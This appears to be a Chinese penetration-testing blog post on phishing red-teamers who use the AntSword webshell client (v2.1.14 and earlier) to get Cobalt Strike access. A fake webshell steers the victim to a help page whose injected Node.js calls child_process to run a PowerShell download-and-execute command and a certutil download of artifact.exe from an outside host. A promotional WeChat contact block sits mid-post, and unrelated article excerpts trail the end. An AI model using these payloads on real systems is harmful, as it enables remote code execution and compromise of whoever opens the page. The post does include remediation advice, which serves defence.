渗透测试 | 利用蚁剑钓鱼上线CS

VSole2024-01-06 15:11:50

前言


中国蚁剑使用Electron构建客户端软件,Electron实现上用的是Node.js,并且Node.js能执行系统命令,故可以利用蚁剑的webshell页面嵌入js来直接执行命令,进而钓鱼来上线CS。(类似Goby,Goby也是使用Electron构建客户端软件)


关键实现


蚁剑在虚拟终端时,页面上出现http/https协议头时会发生转换(字体会变蓝,表示处于超链接的状态),并且这个链接点开时所打开的页面是以蚁剑内部的浏览器进行打开的(最新版本修复后使用用户自带的浏览器打开),因此这便是我们利用页面执行Node.js来上线CS的好机会!




反制复现


环境准备:




想要执行系统命令需要借助页面的加载,此时可以制造假的webshell来故意让红队连接,进而一步步引导红队点击恶意链接调用node.js进行命令执行,上钩。


影响的版本:AntSword < =v2.1.14


AntSword下载:https://github.com/AntSwordProject/antSword/releases


开源假webshell:https://github.com/MD-SEC/Anti_AntSword


1、蓝队故意在服务器放置假的webshell进行钓鱼


达到真实的效果可以添加一些提示信息,让红队上钩


<body>
AntSword password admin
</body>
</html>




红队需要让其点击的恶意链接(利用蚁剑自带的帮助文档效果最佳)


【----帮助网安学习,以下所有学习资料免费领!加vx:dctintin,备注“freebuf”获取!】


① 网安学习成长路径思维导图


② 60+网安经典常用工具包


③ 100+SRC漏洞分析报告


④ 150+网安攻防实战技术电子书


⑤ 最权威CISSP 认证考试指南+题库


⑥ 超1800页CTF实战技巧手册


⑦ 最新网安大厂面试题合集(含答案)


⑧ APP客户端安全检测指南(安卓+IOS)



在钓鱼的帮助文档的开头插入恶意payload,这里利用powershell一句话上线


<script type="text/javascript">
require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.168.108.150:8080/a\'))"',(error, stdout, stderr)=>{     alert(`stdout: ${stdout}`); });
</script>


或者下载文件方式上线CS


</script>
<script type="text/javascript">require('child_process').exec("certutil.exe -urlcache -split -f http://192.168.108.150/artifact.exe C:/artifact.exe && C:/Windows/System32/conhost.exe C:/artifact.exe");</script>



注:payload一定要放开头,放后面可能由于html过大导致命令执行失败


可以自行编写攻击者点击钓鱼链接时的话术



2、红队开始利用蚁剑进行连接



模拟红队的文件浏览页面




模拟红队的命令行操作回显



3、开始钓鱼引诱红队


当红队输入没有提前在webshell模拟的命令时,就会回显一开始我们设置的钓鱼话术,引导攻击者点击恶意链接



红队点击恶意链接,出现正常的帮助文档


将红队发送的木马样本放在与cve-2022-39197.py脚本同一路径下



帮助文档由蚁剑内部的浏览器进行解析,该蚁剑浏览器会调用我们钓鱼页面恶意的js进行命令执行,然后上线CS


修复建议


1、升级至 AntSword v2.1.15版本


2、加载链接时候禁止使用内部浏览器打开,使用用户系统的浏览器打开


最后


此蚁剑反制虽然是一个之前曝光的漏洞了,但是基数上还是会有人在使用着存在漏洞的蚁剑版本,对于红队来说能白嫖webshell还是很诱惑的,可玩性也很高。


软件渗透测试
本作品采用《CC 协议》,转载必须注明作者和本文链接
昨日,勒索软件Conti遭遇毁灭性打击,乌克兰安全研究人员公布了其软件源代码和内部通讯内容。
Conti是近年来最为活跃和危险的勒索软件团伙之一。该组织采用勒索软件即服务 (RaaS) 的运营模式,其中核心团队管理恶意软件和Tor站点,而招募的联盟机构则执行网络漏洞和数据加密攻击。核心团队赚取赎金的20~30%,而附属公司赚取其余部分。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。之前我也分享过一篇"ToDesk软件在权限提升中的应用",记录的是在权限提升场景下的利用方式。更多这类第三方远控软件的利用方式可参考之前发的系列文章,有向日葵、AnyDesk、TeamViewer等。
0x01 正文事出起因,是因为有人找我破解这个软件,顺势就看了下,官网:http://www.ysjfp.com/竟然是有登录框,那我就用抓包来分析下可以看到数据是直接连的115.28.19.219的3306端口,所以初步判断数据包里一定夹杂着数据库的账号密码经过分析,qdm163903329是数据库连接的账号,同时,数据包内并没有数据库连接密码(推荐用wireshark分析)竟然有账号却没有密码
对于专业的渗透测试人员,人们通常称之为道德黑客、白帽黑客或红队队员。渗透测试人员有时也背负骂名——因为花费时间采用大量勒索软件攻击很多企业。 渗透测试人员的工作是帮助企业加强网络安全防护以确保业务安全。渗透测试人员充当了勒索软件攻击者,根据他们的经验,企业应该提出以下五个问题:
Headless Chrome是谷歌Chrome浏览器的无界面模式,通过命令行方式打开网页并渲染,常用于自动化测试、网站爬虫、网站截图、XSS检测等场景。
在2017年,网络攻击者在一个金融软件包中植入了NotPetya恶意蠕虫。当很多企业更新他们的软件时,就会被感染。NotPetya蠕虫病毒因此迅速传播,并为全球各地的企业带来数十亿美元的损失。美国政府称其为“史上最具破坏性和代价最高的网络攻击”。 在三年后,网络攻击者侵入了SolarWinds公司的Orion网络监控工具集的软件升级过程。其带来的破坏性也是十分广泛的。
针对软件供应链的网络攻击,常常利用系统固有安全漏洞,或者预置的软件后门开展攻击活动,并通过软件供应链形成的网链结构将攻击效果向下游传播给供应链中所有参与者。近年来,软件供应链网络攻击事件频发,影响越来越大。据 Accenture 公司调查,2016 年 60% 以上的网络攻击是供应链攻击。装备软件供应链安全事关国家安全、军队安全,一旦出现安全风险将会给国家和军队带来重大安全挑战,产生的后果不堪设想。
渗透测试的本质是信息收集,无论是web还是内网,信息收集的全面性都直接着影响到后续渗透工作。在进入内网后,需要判断当前网络环境和权限,为后续横向移动等工作做好铺垫,本篇文章主要针对windows系统下的信息收集。
由青岛蓝湾信息科技有限公司主办,四叶草安全科技(青岛)有限公司承办的2022年蓝贝国际创新创业大赛的预热活动——“数字技术+信息安全领域赛道”预热赛“网络攻防大赛”圆满结束。No.2四叶草安全科技(青岛)有限公司独家承办独家承办本次网络攻防大赛由四叶草安全科技(青岛)有限公司独家承办。四叶草安全科技(青岛)以自身影响力从不同专业领域赛道吸引众多参赛报名企业。
VSole
网络安全专家